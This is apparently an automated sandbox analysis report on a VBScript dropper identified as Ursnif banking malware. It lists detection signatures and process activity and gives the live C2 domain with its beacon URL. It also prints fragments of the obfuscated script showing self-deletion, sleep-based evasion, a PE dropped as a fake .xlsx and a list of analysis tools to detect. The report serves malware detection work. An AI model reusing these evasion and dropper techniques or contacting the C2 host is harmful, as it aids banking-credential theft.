Loading ...

Play interactive tourEdit tour

Analysis Report 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs

Overview

General Information

Sample Name:3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs
Analysis ID:329942
MD5:e913defabdbffb6f3e8f5059d44cbf5f
SHA1:6b7712ee4b899e009e9fca462168041cbedb881a
SHA256:c3d02a137b9fffdcc4b61fba5f6653a35c4cee283ad0f0c878bc4e8a5fee6cf9

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Benign windows process drops PE files
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
Creates processes via WMI
Deletes itself after installation
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
AV process strings found (often used to terminate AV products)
Contains capabilities to detect virtual machines
Dropped file seen in connection with other malware
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w10x64
  • wscript.exe (PID: 3000 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • iexplore.exe (PID: 5900 cmdline: 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding MD5: 6465CB92B25A7BC1DF8E01D8AC5E7596)
    • iexplore.exe (PID: 5460 cmdline: 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5900 CREDAT:17410 /prefetch:2 MD5: 071277CC2E3DF41EEEA8013E2AB58D5A)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
            Click to see the 4 entries

            Sigma Overview

            No Sigma rule has matched

            Signature Overview

            Click to jump to signature section

            Show All Signature Results

            AV Detection:

            barindex
            Multi AV Scanner detection for domain / URLShow sources
            Source: api10.laptok.atVirustotal: Detection: 12%Perma Link
            Source: http://api10.laptok.at/favicon.icoVirustotal: Detection: 12%Perma Link
            Multi AV Scanner detection for dropped fileShow sources
            Source: C:\Users\user\AppData\Local\Temp\occurrent.xlsxVirustotal: Detection: 36%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\occurrent.xlsxMetadefender: Detection: 16%Perma Link
            Source: C:\Users\user\AppData\Local\Temp\occurrent.xlsxReversingLabs: Detection: 28%
            Multi AV Scanner detection for submitted fileShow sources
            Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbsVirustotal: Detection: 20%Perma Link
            Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbsReversingLabs: Detection: 22%
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
            Source: Joe Sandbox ViewIP Address: 47.241.19.44 47.241.19.44
            Source: Joe Sandbox ViewASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC
            Source: global trafficHTTP traffic detected: GET /api1/tcaxpvd4aE8wKgoJlfYM2r/mfaTHqejrF6Ms/fbc5TC6Y/Ifyg72FAqKAjYDX6bHayr47/eRQRrltwQ5/64lRZGzla3M_2B0WA/kxTVS_2Fr7nt/rK_2BABkAtX/yDDo6_2B3pEN9H/NYwyDmo_2FYcvMVgPGpXD/Exdt_2FIBawltH_2/Fy0azIOxL7Yasif/vnkFJ0vm4N7tHBKMPY/K42llqWvr/aTpOJPo87yeEq9IUL2sh/sTONsr4H4kkXgR8pHPc/bMTnM0tyiyC_2FFNJsEa_0/A_0DFjfJrb9DF/SHbL_2BH/ZaYX_2BNdJdcrZzOwiVlaeh/daUI_2B_2BvtnK/3 HTTP/1.1Accept: text/html, application/xhtml+xml, image/jxr, */*Accept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: api10.laptok.atConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: api10.laptok.atConnection: Keep-Alive
            Source: msapplication.xml0.15.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa32ff212,0x01d6d169</date><accdate>0xa32ff212,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml0.15.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.facebook.com/"/><date>0xa32ff212,0x01d6d169</date><accdate>0xa32ff212,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Facebook.url"/></tile></msapplication></browserconfig> equals www.facebook.com (Facebook)
            Source: msapplication.xml5.15.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa3325271,0x01d6d169</date><accdate>0xa3325271,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml5.15.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.twitter.com/"/><date>0xa3325271,0x01d6d169</date><accdate>0xa3325271,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Twitter.url"/></tile></msapplication></browserconfig> equals www.twitter.com (Twitter)
            Source: msapplication.xml7.15.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa334b4ac,0x01d6d169</date><accdate>0xa334b4ac,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: msapplication.xml7.15.drString found in binary or memory: <browserconfig><msapplication><config><site src="http://www.youtube.com/"/><date>0xa334b4ac,0x01d6d169</date><accdate>0xa334b4ac,0x01d6d169</accdate></config><tile><wide310x150logo/><square310x310logo/><square70x70logo/><favorite src="C:\Users\user\Favorites\Youtube.url"/></tile></msapplication></browserconfig> equals www.youtube.com (Youtube)
            Source: unknownDNS traffic detected: queries for: api10.laptok.at
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 13 Dec 2020 16:03:59 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingContent-Encoding: gzipData Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30
            Source: {CD3F675A-3D5C-11EB-90EB-ECF4BBEA1588}.dat.15.drString found in binary or memory: http://api10.laptok.at/api1/tcaxpvd4aE8wKgoJlfYM2r/mfaTHqejrF6Ms/fbc5TC6Y/Ifyg72FAqKAjYDX6bHayr47/eR
            Source: msapplication.xml.15.drString found in binary or memory: http://www.amazon.com/
            Source: msapplication.xml1.15.drString found in binary or memory: http://www.google.com/
            Source: msapplication.xml2.15.drString found in binary or memory: http://www.live.com/
            Source: msapplication.xml3.15.drString found in binary or memory: http://www.nytimes.com/
            Source: msapplication.xml4.15.drString found in binary or memory: http://www.reddit.com/
            Source: msapplication.xml5.15.drString found in binary or memory: http://www.twitter.com/
            Source: msapplication.xml6.15.drString found in binary or memory: http://www.wikipedia.com/
            Source: msapplication.xml7.15.drString found in binary or memory: http://www.youtube.com/

            Key, Mouse, Clipboard, Microphone and Screen Capturing:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808747913.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808851885.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808712663.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808866758.0000000005038000.00000004.00000040.sdmp, type: MEMORY

            E-Banking Fraud:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808747913.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808851885.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808712663.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808866758.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\occurrent.xlsx 2804E1927303F37313996430C3F824DB6F0A471793CCAE5D5E29216C60BDA682
            Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbsInitial sample: Strings found which are bigger than 50
            Source: occurrent.xlsx.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: classification engineClassification label: mal100.troj.evad.winVBS@4/22@1/1
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{CD3F6758-3D5C-11EB-90EB-ECF4BBEA1588}.datJump to behavior
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\adobe.urlJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs'
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbsVirustotal: Detection: 20%
            Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbsReversingLabs: Detection: 22%
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\3a07d9bd-1b72-4b18-a990-8f53801474f5.vbs'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5900 CREDAT:17410 /prefetch:2
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:5900 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: 3a07d9bd-1b72-4b18-a990-8f53801474f5.vbsStatic file information: File size 2513120 > 1048576
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: Binary string: c:\Letterplease\CompareBlack\PlanKey\coast.pdb source: wscript.exe, 00000000.00000003.695178890.000002367448D000.00000004.00000001.sdmp, occurrent.xlsx.0.dr

            Data Obfuscation:

            barindex
            VBScript performs obfuscated calls to suspicious functionsShow sources
            Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.QuitEnd IfIf (must447 = 5000000) ThennrIOBNG = nrIOBNG + (104 - ((1234 - (4335 - 3205.0)) - 100.0))End IfREM sadism shah461 Dortmund altar spheric inapproachable protractor allotted chill617 craftsmen bacchanalian, Linotype Parthia crimp Riemannian actinic Aaron510 Abelson palisade hydrothermal croupier morbid latitude Seidel betide iodine connotation explode headwind negate wise cambric perpetuate Azerbaijan. smallpox Meistersinger contractor. coffee bemuse Lagos monetarism wishful scattergun narcotic lid pinhole brownish pica PTA, 3566063 bobble acerbic, affectionate interferometer polytechnic cosmopolitan ascension, tribe prostaglandin310 necessitate Bootes tremble88 Vida occidental drippy Cuba, orient wand tableaux flagellate. 5841248 rapier irretrievable Notre261 varistor posterior accusative platonic Sanhedrin, Eros form pluck macrophage thy Mansfield PVC Belize Spain monsieur knack Jorgenson leap31 owe too shabby delusive imbalance impassive improbable If (must447 = 200) ThenExit DoEnd ifmust447 = must447 + 1LoopWith WScript.Sleep 5000End With' whorl bluff penitent Cyrillic wastage atheist Grenoble unchristian famish Barrett Tasmania889 Chicano psychosis teat896 tort Brooklyn auspice, Ackerman Prado Daytona insignia myel Norfolk. martini leisure incautious lock calligraphy Sol whiz left907 empire Anna Pasadena contribution dryad posey. declamatory froze mock701, 3443966 assign Burke guardian prehensile JACM shrike mi Kauffman teat470 gnat maser pompey mammal mulct cant Vassar Yaounde staph cachalot929 Eleazar Sikorsky serene swam prurient Stamford Formosa retention chartreuse befallen spalding. vouch decipher ancient. click demoniac Cochran girlish desolater strategist, Brandt fricative cacao exhilarate rapprochement Chinook Pitt978 Aquinas End FunctionFunction VTuCrj()' sensual, 1938734 demented cork politicking tropic hay marigold malnourished scarves Simpson ppm cuttlefish707 sum73 megaton fiance Astoria course, 8993080 circumvention869 without sugary paraphernalia Luftwaffe91 carton excessive jumpy leadeth237 millionaire instruct, 1390117 copywriter gel145 wallow. 1785352 glen901 acclaim bestir radiophysics swampland486 Cecil remediable cop restive ashen everybody mercuric Thetis124 sorghum rob doctoral chef wisecrack turnabout Galatea sinistral Mendelian magnanimous courage primitive test Friedman kibitz heavy Virginia lumen botanic flute inputting grandfather. stater Dim confiscatory: Set confiscatory = WScript.CreateObject("Scripting.FileSystemObject")confiscatory.DeleteFile WScript.ScriptFullName, TrueEnd FunctionFunction Doria(transonic, lunge)Dim TPeZLgi, Worcestershire43Set TPeZLgi = CreateObject("Scripting.FileSystemObject")REM bismuth methyl. melon Barney dharma. standoff impious slide pee919, testicle vale fishpond. referent backpedal TWA cotangent centenary heel corrodible343 Saviour, wingtip925 viewpoint114 boolean483 hereinabove. 3232348 checksummed, pass sentential accretion colonist Cartesian. 5287369 ea

            Persistence and Installation Behavior:

            barindex
            Creates processes via WMIShow sources
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\occurrent.xlsxJump to dropped file
            Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Local\Temp\occurrent.xlsxJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 00000004.00000002.810231625.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808835058.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808660831.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808787211.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808809218.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808747913.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808851885.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808712663.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000003.808866758.0000000005038000.00000004.00000040.sdmp, type: MEMORY
            Deletes itself after installationShow sources
            Source: C:\Windows\System32\wscript.exeFile deleted: c:\users\user\desktop\3a07d9bd-1b72-4b18-a990-8f53801474f5.vbsJump to behavior
            Source: C:\Windows\System32\wscript.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion:

            barindex
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: AUTORUNSC.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: EMUL.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: HOOKEXPLORER.EXEA
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: APISPY.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: $FAKEHTTPSERVER.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: SBIECTRL.EXE@
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: REGMON.EXEIK
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: WINDBG.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: SBIESVC.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: SCKTOOL.EXE;HQ
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: IDAQ.EXET
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: IMPORTREC.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: IMUL.EXE.8
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: WINDUMP.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: Q?$SANDBOXIERPCSS.EXEV5
            Source: wscript.exe, 00000000.00000003.695861434.000002366C2E4000.00000004.00000001.sdmpBinary or memory string: XE","WINALYSIS.EXE","EMUL.EXE","MALMON.EXE","REPUTILS32.EXE","WINAPIOVERRIDE32.EXE","ETHEREAL.EXE","MBARUN.EXE","REPUX.EXE","WINDBG.EXE","ETTERCAP.EXE","MDPMON.EXE","RUNSAMPLE.EXE","WINDUMP.EXE","FAKEHTTPSERVER.EXE","MMR.EXE","SAMP1E.EXE","WINSPY.EXE","FAKESERVER.EXE","MMR.EXE","SAMPLE.EXE","WIRESHARK.EXE","FIDDLER.EXE","MULTIPOT.EXE","SANDBOXIECRYPTO.EXE","XXX.EXE","FILEMON.EXE","NETSNIFFER.EXE","SANDBOXIEDCOMLAUNCH.EXE")
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-32.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: SYSANALYZER.EXEA
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: PETOOLS.EXEJ
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: PROCMON.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: HOOKANAAPP.EXER
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: OLLYDBG.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: NETSNIFFER.EXEK
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: AUTORUNS.EXE@
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: :FRIDA-WINJECTOR-HELPER-64.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: IDAG.EXEZ:V
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: TCPDUMP.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: FILEMON.EXET
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: U.SANDBOXIEDCOMLAUNCH.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: A9$BEHAVIORDUMPER.EXEQ
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: PEID.EXE/O#Z
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: REGSHOT.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: DUMPCAP.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: WIRESHARK.EXE
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: FORTITRACER.EXEA
            Source: C:\Windows\System32\wscript.exeFile opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Jump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\occurrent.xlsxJump to dropped file
            Source: C:\Windows\System32\wscript.exe TID: 6888Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
            Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\userJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppDataJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\System32\wscript.exeFile opened: C:\Users\user\AppData\LocalJump to behavior

            HIPS / PFW / Operating System Protection Evasion:

            barindex
            Benign windows process drops PE filesShow sources
            Source: C:\Windows\System32\wscript.exeFile created: occurrent.xlsx.0.drJump to dropped file
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeQueries volume information: C:\Users\user\AppData\Local\Temp\bucket.zip VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: procmon.exe
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: tcpview.exe
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: wireshark.exe
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: avz.exe
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: cports.exe
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: lordpe.exe
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: icesword.exe
            Source: wscript.exe, 00000000.00000003.695704257.000002366F2FA000.00000004.00000001.sdmpBinary or memory string: ollydbg.exe
